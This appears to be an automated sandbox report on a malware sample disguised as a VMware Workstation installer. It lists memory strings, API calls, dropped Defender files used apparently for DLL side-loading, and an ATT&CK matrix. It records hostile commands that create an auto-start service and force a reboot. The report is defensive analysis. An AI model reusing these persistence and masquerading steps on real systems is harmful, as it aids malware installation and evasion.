Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineRPC_HGFSSetTags@@YGHXZ
Source: vmwarebase.dll.3.dr	Binary or memory string: ?AsyncSocket_ConnectVMCI@@YGHXZ
Source: Update.exe, 00000003.00000002.2064689456.000000001BA00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILE%\AppData\Local\DefMeta\vmware-authd.exe%USERPROFILE%\AppData\Local\DefMeta\vmware-authd.exe
Source: vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineQueryShared_VMCI
Source: vmwarebase.dll.3.dr	Binary or memory string: W32Util_GetVMwareGroupSid
Source: Update.exe, 00000003.00000002.2064689456.000000001B9F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: file:///C:/Users/user/AppData/Local/DefMeta/app-1.0.0/vmware-authd.exedCQI
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineRPC_HGFSSetReadAccess@@YGHXZ
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ApplyReleasesImpl: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe, workingDir C:\Users\user\AppData\Local\DefMeta\app-1.0.0, args , toastActivatorCSLID 42308fda-ab09-5018-a5bc-4c64b70949ed)2!
Source: vmware-authd.exe.3.dr	Binary or memory string: VMware, Inc.1
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\DefMeta\vmware-authd.e
Source: Update.exe, 00000003.00000002.2064446996.000000001B980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: Update.exe, 00000003.00000002.2064446996.000000001B980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Woation.lnk&l
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: kApplyReleasesImpl: Creating shortcut for vmware-authd.exe => C:\Users\user\Desktop\VMware Workstation.lnk2!
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [16/02/24 14:29:58] info: ApplyReleasesImpl: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe, workingDir C:\Users\user\AppData\Local\DefMeta\app-1.0.0, args , toastActivatorCSLID 42308fda-ab09-5018-a5bc-4c64b70949ed)u
Source: Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lib\net48\vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineRPC_HGFSSetExpiration
Source: vmware-authd.exe, 00000008.00000002.3264575511.000000006E17C000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
Source: Update.exe, 00000003.00000002.2064446996.000000001B98A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .vmware-authd.exe >
Source: Update.exe, 00000003.00000002.2064689456.000000001BA00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "com.squirrel.DefMeta.vmware-authd33
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pData\Local\DefMeta\app-1.0.0\vmware-authd.exe
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: iC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk
Source: Update.exe, 00000003.00000002.2064689456.000000001B9F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exeXC
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe, workingDir C:\Users\user\AppData\Local\DefMeta\app-1.0.0, args , toastActivatorCSLID 42308fda-ab09-5018-a5bc-4c64b70949ed)
Source: vmwarebase.dll.3.dr	Binary or memory string: AsyncSocket_ListenVMCI
Source: Update.exe, 00000003.00000002.2064689456.000000001B9E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\vmware-authd.exeexe
Source: vmware-authd.exe.3.dr	Binary or memory string: VMware Server Console
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1998-2022 VMware, Inc.p^!
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ]3uC:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exexr
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineQuery_HGFS@@YGHXZ
Source: VMware Workstation.lnk.3.dr	Binary or memory string: DefMeta)..\AppData\Local\DefMeta\vmware-authd.exe/C:\Users\user\AppData\Local\DefMeta\app-1.0.06C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe
Source: vmware-authd.exe.3.dr	Binary or memory string: VMware Workstation
Source: Update.exe, 00000003.00000002.2062592570.000000000324D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lib/net48/vmwarebase.dll0y
Source: vmware-authd.exe.3.dr	Binary or memory string: OriginalFilenamevmware-authd.exeF
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /C:/Users/user/AppData/Local/DefMeta/app-1.0.0/vmware-authd.exe
Source: vmware-authd.exe.3.dr	Binary or memory string: : SSL RequiredNFCSSL supported/tServerDaemonProtocol:SOAPVMware%s Authentication Daemon Version %u.%u%s, %s, %s, %s, %s, %s%sError retrieving thumbprintInvalid arguments to '%s%s'Login failed: token key authentication not allowed.GET TOKEN KEY failed: got %s
Source: vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineQueryShared_VMCI@@YGHXZ
Source: vmware-authd.exe, 00000008.00000002.3262825015.0000000002C3C000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume3\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3263231070.0000000002980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_shimengstate_vmware-authd.exe_5456.txtx[
Source: vmware-authd.exe	Binary or memory string: 599 vmware-authd PANIC: %s
Source: vmware-authd.exe.3.dr	Binary or memory string: http://www.vmware.com/0/
Source: vmware-authd.exe, 00000004.00000002.3263231070.0000000002980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_DetectorsTrace_vmware-authd.exe_5456.txt
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware-authd2!
Source: vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_VMCISetID
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineQueryShared_HGFS@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: file:///C:/Users/user/AppData/Local/DefMeta/app-1.0.0/vmware-authd.exe
Source: VMware Workstation.lnk0.3.dr	Binary or memory string: .vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineRPC_HGFSSetGuestName
Source: vmware-authd.exe.3.dr	Binary or memory string: 1998-2022 VMware, Inc.J
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: QC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, IncX
Source: vmware-authd.exe.3.dr	Binary or memory string: vmware-vmx-stats.exe
Source: Update.exe, 00000003.00000002.2062592570.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: >C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmwarebase.dll@
Source: vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_VMCISetFiltering@@YGHXZ
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ApplyReleasesImpl: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe, workingDir C:\Users\user\AppData\Local\DefMeta\app-1.0.0, args , toastActivatorCSLID 42308fda-ab09-5018-a5bc-4c64b70949ed)2!
Source: vmware-authd.exe.3.dr	Binary or memory string: User not authorized for vpx agent contactvmware-vpxaUser not authorized for vmx contactConnecting socket=%s
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineRPC_HGFSSetExpiration@@YGHXZ
Source: Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0http://defaultcontainer/lib/net48/vmwarebase.dll
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_PcaCliTrace_vmware-authd.exe_5456.txtx
Source: vmware-authd.exe, 00000004.00000002.3263231070.0000000002980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_ApphelpDebug_vmware-authd.exe_5456.txthL
Source: vmware-authd.exe, 00000008.00000002.3263091725.00000000030B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware-authd.exet.dll.mui
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineRPC_HGFSSetHostDefaultCase@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineRPC_HGFSSetHostPath@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineRPC_HGFSSetPresent
Source: vmware-authd.exe.3.dr	Binary or memory string: vmware-vpxa

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe

Code function: 0_2_00F9A2FF IsDebuggerPresent,OutputDebugStringW,

0_2_00F9A2FF

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe

Code function: 0_2_00F97326 SetDefaultDllDirectories,LoadLibraryW,GetProcAddress,CoInitialize,InitCommonControlsEx,GetModuleHandleW,GetModuleFileNameW,

0_2_00F97326

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00FA52EB mov eax, dword ptr fs:[00000030h]	0_2_00FA52EB
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00FA1584 mov eax, dword ptr fs:[00000030h]	0_2_00FA1584
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E10E66F mov eax, dword ptr fs:[00000030h]	4_2_6E10E66F
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E10270A mov eax, dword ptr fs:[00000030h]	4_2_6E10270A

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe

Code function: 0_2_00FA6580 GetProcessHeap,

0_2_00FA6580

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F9A3EF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00F9A3EF
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F9DED4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F9DED4
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F9AE25 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F9AE25
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F9AFBB SetUnhandledExceptionFilter,	0_2_00F9AFBB
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_004884CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_004884CB
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_004890E3 SetUnhandledExceptionFilter,	4_2_004890E3
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_00488F80 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00488F80
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0FCD37 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6E0FCD37
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0EFA0B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6E0EFA0B
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0F0281 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6E0F0281
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E3BF81F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6E3BF81F

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

File created: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Code function: 4_2_6E0C5710 ShellExecuteExW,WaitForSingleObject,CloseHandle,

4_2_6E0C5710

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process created: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe "C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe" --squirrel-firstrun	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown.exe -r -t 1 -f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown.exe -r -t 1 -f	Jump to behavior

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Code function: 4_2_00484850 AllocateAndInitializeSid,calloc,InitializeAcl,GetLastError,Warning,AddAccessAllowedAce,GetLastError,Warning,IsValidAcl,GetLastError,Warning,LocalAlloc,InitializeSecurityDescriptor,GetLastError,Warning,SetSecurityDescriptorDacl,GetLastError,Warning,IsValidSecurityDescriptor,GetLastError,Warning,CreateNamedPipeW,GetLastError,Warning,CreateEventW,GetLastError,Warning,FreeSid,free,LocalFree,CloseHandle,CloseHandle,ConnectNamedPipe,GetLastError,GetLastError,Warning,FreeSid,free,LocalFree,

4_2_00484850

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

4_2_00484850

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe

Code function: 0_2_00F9AC7E cpuid

0_2_00F9AC7E

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: GetLocaleInfoW,	4_2_6E112EA9
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: EnumSystemLocalesW,	4_2_6E112F50
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: EnumSystemLocalesW,	4_2_6E112F9B
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	4_2_6E112CAE
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: GetLocaleInfoW,	4_2_6E107D44
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: EnumSystemLocalesW,	4_2_6E107822
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_6E11360F
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_6E11343A
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: GetLocaleInfoW,	4_2_6E113540
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: GetLocaleInfoW,	4_2_6E113314
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: EnumSystemLocalesW,	4_2_6E113036
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_6E1130C1

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Queries volume information: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

4_2_00484850

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe

Code function: 0_2_00F9B06B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00F9B06B

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Code function: 4_2_00486810 calloc,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetLastError,ImpersonateLoggedOnUser,GetLastError,GetUserNameW,RevertToSelf,GetLastError,Warning,Warning,free,Warning,Warning,GetEnvironmentStringsW,GetLastError,CreateEnvironmentBlock,GetLastError,GetLastError,LoadUserProfileW,GetLastError,CreateEnvironmentBlock,GetLastError,GetLastError,SetEnvironmentVariableW,FreeEnvironmentStringsW,DestroyEnvironmentBlock,DestroyEnvironmentBlock,free,UnloadUserProfile,CloseHandle,free,GetLastError,

4_2_00486810

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Code function: 4_2_6E10AB22 _free,GetTimeZoneInformation,_free,

4_2_6E10AB22

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: vmware-authd.exe, 00000008.00000003.2117689030.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115740534.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121078090.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120194531.00000000030B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe
Source: vmware-authd.exe, 00000008.00000003.2117689030.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2108819173.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115740534.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2121078090.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2110976045.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2114726725.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2107109507.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2115002407.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2111653253.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, vmware-authd.exe, 00000008.00000003.2120194531.00000000030B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F912B1 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,		0_2_00F912B1
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_00484B50 socket,setsockopt,WSAGetLastError,htonl,htons,bind,listen,WSAGetLastError,CreateEventW,GetLastError,WSAEventSelect,WSAGetLastError,CloseHandle,closesocket,		4_2_00484B50

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 Service Execution	5 Windows Service	1 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Timestomp	NTDS	34 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	5 Windows Service	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Process Injection	2 Masquerading	Cached Domain Credentials	241 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Valid Accounts	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	141 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	141 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0923840932020004-3-0.exe	10%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Program Files (x86)\Microsoft.NET\MpClient.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll	0%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe	0%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll	0%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\EppManifest.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\EppManifest.dll	0%	Virustotal	Browse
C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll	0%	Virustotal	Browse
